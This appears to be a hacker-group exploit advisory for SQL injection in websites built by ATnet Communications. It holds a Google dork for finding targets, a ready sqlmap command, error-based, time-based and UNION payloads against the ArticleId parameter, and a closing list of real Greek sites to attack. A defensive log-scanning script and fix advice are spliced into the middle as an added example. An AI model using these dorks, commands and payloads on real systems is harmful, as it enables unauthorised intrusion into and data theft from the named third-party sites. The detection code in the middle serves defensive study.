#################################################################################
# Exploit Title: ATnet Communications SQL Injection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Κατασκευή ιστοσελίδων: ATnet Communications Α.Ε." inurl:ArticleId=
# Tested on : Kali Linux 2018.1
# Date : 10.03.2018
# Vendor Home: https://www.atnet.gr/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial:
[+] Dorking in Google or another search engine
[+] sqlmap or manual testing
[+] The GET parameter "ArticleId" is vulnerable to SQL injection
[+] The back-end DBMS is MySQL
Command:
root@TrazeR:~# sqlmap --timeout=10 --threads=10 --time-sec=2 --random-agent --level=5 --risk=3 --ignore-proxy --no-cast -u "http://78-45.gr/Article.php?PageId=1&ArticleId=" --batch --dbs

Parameter: ArticleId (GET)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: PageId=1&ArticleId=-7597 OR 1 GROUP BY CONCAT(0x71786a6b71,(SELECT (CASE WHEN (6295=6295) THEN 1 ELSE 0 END)),0x717a766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: PageId=1&ArticleId=(CASE WHEN (6003=6003) THEN SLEEP(2) ELSE 6003 END)

    Type: UNION query
    Title: Generic UNION query (random number) - 18 columns
    Payload: PageId=1&ArticleId=-6785 UNION ALL SELECT 6538,6538,6538,6538,6538,6538,6538,6538,CONCAT(0x71786a6b71,0x5253675362784f4f6a5a79476148654b786d5a6b53645a6d44444863617478427458444c527a5a47,0x717a766b71),6538,6538,6538,6538,6538,6538,6538,6538,6538-- kbxR
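
A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web access-log lines for Article.php requests whose PageId or ArticleId is not a plain integer and labels the three technique families sqlmap reported. The log format, the sample lines and the assumption that both parameters are integer IDs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: Article.php expects plain non-negative integers in these parameters.
NUMERIC_PARAMS = ("PageId", "ArticleId")

# One signature per technique family named in the sqlmap output above.
SIGNATURES = {
    "error-based": re.compile(r"GROUP\s+BY\s+CONCAT\(.*FLOOR\(RAND\(", re.I | re.S),
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP range, shortened values).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Mar/2018:12:00:01 +0000] "GET /Article.php?PageId=1&ArticleId=14 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [10/Mar/2018:12:00:02 +0000] "GET /Article.php?PageId=1&ArticleId= HTTP/1.1" 200 310',
    '192.0.2.66 - - [10/Mar/2018:12:00:03 +0000] "GET /Article.php?PageId=1&ArticleId=-1%20OR%201%20GROUP%20BY%20CONCAT(0x71,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)%23 HTTP/1.1" 500 98',
    '192.0.2.66 - - [10/Mar/2018:12:00:04 +0000] "GET /Article.php?PageId=1&ArticleId=(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(2)%20ELSE%201%20END) HTTP/1.1" 200 310',
    '192.0.2.66 - - [10/Mar/2018:12:00:07 +0000] "GET /Article.php?PageId=1&ArticleId=-1%20UNION%20ALL%20SELECT%201,2,3--%20x HTTP/1.1" 200 310',
]

def classify(value):
    """Return [] for a clean integer, else the matching labels or 'non-numeric'."""
    if re.fullmatch(r"[0-9]+", value):
        return []
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return hits or ["non-numeric"]

def scan_line(line):
    """Map each suspicious numeric parameter in one log line to its labels."""
    match = REQUEST_RE.search(line)
    if not match:
        return {}
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/article.php"):
        return {}
    findings = {}
    for key, value in parse_qsl(url.query, keep_blank_values=True):  # URL-decodes
        labels = classify(value) if key in NUMERIC_PARAMS else []
        if labels:
            findings[key] = labels
    return findings

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, 1):
        print(number, scan_line(line) or "ok")
```

Detection of this kind supports triage only; the fix on the application side is to cast ArticleId to an integer or bind it in a prepared statement before it reaches the MySQL query.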
Demo SQL:
http://78-45.gr/Article.php?PageId=1&ArticleId=
http://alamano.gr/Article.php?PageId=1&ArticleId=14
http://envirochem.gr/Article.php?PageId=87&ArticleId=1&Language=el
http://dknotary.gr/Article.php?PageId=137&ArticleId=642&Language=en
Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR